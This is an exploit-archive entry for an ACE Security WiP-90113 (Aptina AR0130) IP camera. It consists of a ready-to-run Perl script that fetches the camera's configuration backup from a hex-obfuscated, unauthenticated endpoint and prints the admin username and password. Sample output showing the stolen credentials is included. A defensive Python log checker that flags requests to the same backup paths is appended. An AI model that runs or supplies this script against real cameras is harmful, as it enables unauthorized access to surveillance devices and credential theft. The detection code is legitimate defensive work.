# Exploit Title: Aptina AR0130 960P 1.3MP Camera - Remote Configuration Disclosure
# Author: Todor Donev
# Date: 2020-02-23
# Vendor: https://acesecurity.jp
# Product Link: https://acesecurity.jp/support/top/wip_series/wip-90113
# CVE: N/A

#!/usr/bin/perl
#
#  ACE SECURITY WiP-90113 HD Camera Remote Configuration Disclosure
#
#  Copyright 2020 (c) Todor Donev
#
#  https://donev.eu/
#
#  Disclaimer:
#  This or previous programs are for Educational purpose ONLY. Do not use it without permission.
#  The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages
#  caused by direct or indirect use of the information or functionality provided by these programs.
#  The author or any Internet provider bears NO responsibility for content or misuse of these programs
#  or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
#  system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's
#  responsibility.
#
#  Use them at your own risk!
#
#  (Don't do anything without permissions)
#
#  [ ACE SECURITY WiP-90113 HD Camera Remote Configuration Disclosure
#  [ ================================================================
#  [ Exploit Author: Todor Donev 2020 <todor.donev@gmail.com>
#  [ Initializing the browser
#  [ >>User-Agent => Mozilla/5.0 (compatible; Konqueror/3.5; NetBSD 4.0_RC3; X11) KHTML/3.5.7 (like Gecko)
#  [ >>Content-Type => application/x-www-form-urlencoded
#  [ <<Connection => close
#  [ <<Date => Sat, 22 Feb 2020 14:10:01 GMT
#  [ <<Accept-Ranges => bytes
#  [ <<Server => thttpd/2.25b 29dec2003
#  [ <<Content-Length => 25893
#  [ <<Content-Type => application/octet-stream
#  [ <<Last-Modified => Sat, 22 Feb 2020 14:10:00 GMT
#  [ <<Client-Date => Sat, 22 Feb 2020 14:10:04 GMT
#  [ <<Client-Peer => 192.168.200.49:8080
#  [ <<Client-Response-Num => 1
#  [
#  [ Username : admin
#  [ Password : admin

use strict;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;
use Gzip::Faster 'gunzip';

my $host = shift || ''; # Full path url to the store
my $cmd = shift || '';  # show - Show configuration dump
$host =~ s/\/$//;
print "\033[2J";    #clear the screen
print "\033[0;0H";  #jump to 0,0
print "[ ACE SECURITY WiP-90113 HD Camera Remote Configuration Disclosure\n";
print "[ ================================================================\n";
print "[ Exploit Author: Todor Donev 2020 <todor.donev\@gmail.com>\n";
if ($host !~ m/^http/){
    print "[ Usage, Password Disclosure: perl $0 https://target:port/\n";
    print "[ Usage, Show Configuration : perl $0 https://target:port/ show\n";
    exit;
}
print "[ Initializing the browser\n";
my $user_agent = rand_ua("browsers");
my $browser = LWP::UserAgent->new(protocols_allowed => ['http', 'https'], ssl_opts => { verify_hostname => 0 });
$browser->timeout(30);
$browser->agent($user_agent);
# my $target = $host."/config_backup.bin";
# my $target = $host."/tmpfs/config_backup.bin";
my $target = $host."\x2f\x77\x65\x62\x2f\x63\x67\x69\x2d\x62\x69\x6e\x2f\x68\x69\x33\x35\x31\x30\x2f\x62\x61\x63\x6b\x75\x70\x2e\x63\x67\x69";
my $request = HTTP::Request->new(GET => $target, [Content_Type => "application/x-www-form-urlencoded"]);
my $response = $browser->request($request) or die "[ Exploit Failed: $!";
print "[ >>$_ => ", $request->header($_), "\n" for $request->header_field_names;
print "[ <<$_ => ", $response->header($_), "\n" for $response->header_field_names;
print "[ Exploit failed! Not vulnerable.\n" and exit if ($response->code ne 200);
my $gzipped = $response->content();
my $config = gunzip($gzipped);
print "[ \n";
if ($cmd =~ /show/) {
    print "[ >> Configuration dump...\n[\n";
    print "[ ", $_, "\n" for split(/\n/, $config);
    exit;
} else {
    print "[ Username : ", $1, "\n" if ($config =~ /username=(.*)/);
    print "[ Password : ", $1, "\n" if ($config =~ /password=(.*)/);
    exit;
}
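For defenders, the check below flags successful requests to the three backup paths the script names, as seen in web-server or reverse-proxy logs. It is an added example, not part of the original exploit; it assumes Common Log Format input, and the sample log lines and function names are constructed for illustration.

```python
import posixpath
import re
from urllib.parse import unquote

# Paths requested by the script above (the last is its hex-escaped string, decoded).
BACKUP_PATHS = {
    "/config_backup.bin",
    "/tmpfs/config_backup.bin",
    "/web/cgi-bin/hi3510/backup.cgi",
}

# Common Log Format: host ident user [time] "request" status bytes
CLF = re.compile(
    r'^(?P<src>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Constructed sample lines (documentation address ranges), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [22/Feb/2020:14:10:01 +0000] "GET /web/cgi-bin/hi3510/backup.cgi HTTP/1.1" 200 25893',
    '198.51.100.7 - - [22/Feb/2020:14:10:05 +0000] "GET //tmpfs/%63onfig_backup.bin HTTP/1.1" 200 25893',
    '192.0.2.10 - admin [22/Feb/2020:14:12:40 +0000] "GET /web/index.html HTTP/1.1" 200 5120',
    '203.0.113.9 - - [22/Feb/2020:14:15:00 +0000] "GET /config_backup.bin HTTP/1.1" 404 0',
]

def normalize(target):
    """Reduce a request target to a canonical path so encoded variants still match."""
    path = re.sub(r"^[a-zA-Z][a-zA-Z0-9+.-]*://[^/]*", "", target)  # absolute-form URI
    path = unquote(path.split("?", 1)[0])                           # drop query, decode %xx
    path = re.sub(r"/+", "/", path)                                 # collapse repeated slashes
    return posixpath.normpath(path)                                 # resolve ./ and ../

def find_config_pulls(lines):
    """Return one record per request that fetched a configuration backup (HTTP 200)."""
    hits = []
    for line in lines:
        m = CLF.match(line)
        if not m or m["status"] != "200":
            continue
        path = normalize(m["target"])
        if path in BACKUP_PATHS:
            hits.append({"src": m["src"], "time": m["ts"], "path": path,
                         "bytes": m["size"], "authenticated": m["user"] != "-"})
    return hits

if __name__ == "__main__":
    for hit in find_config_pulls(SAMPLE_LOG):
        print(hit)
```

Any hit with `authenticated` set to false means the backup was served without credentials; treat the account passwords stored on that device as exposed and rotate them.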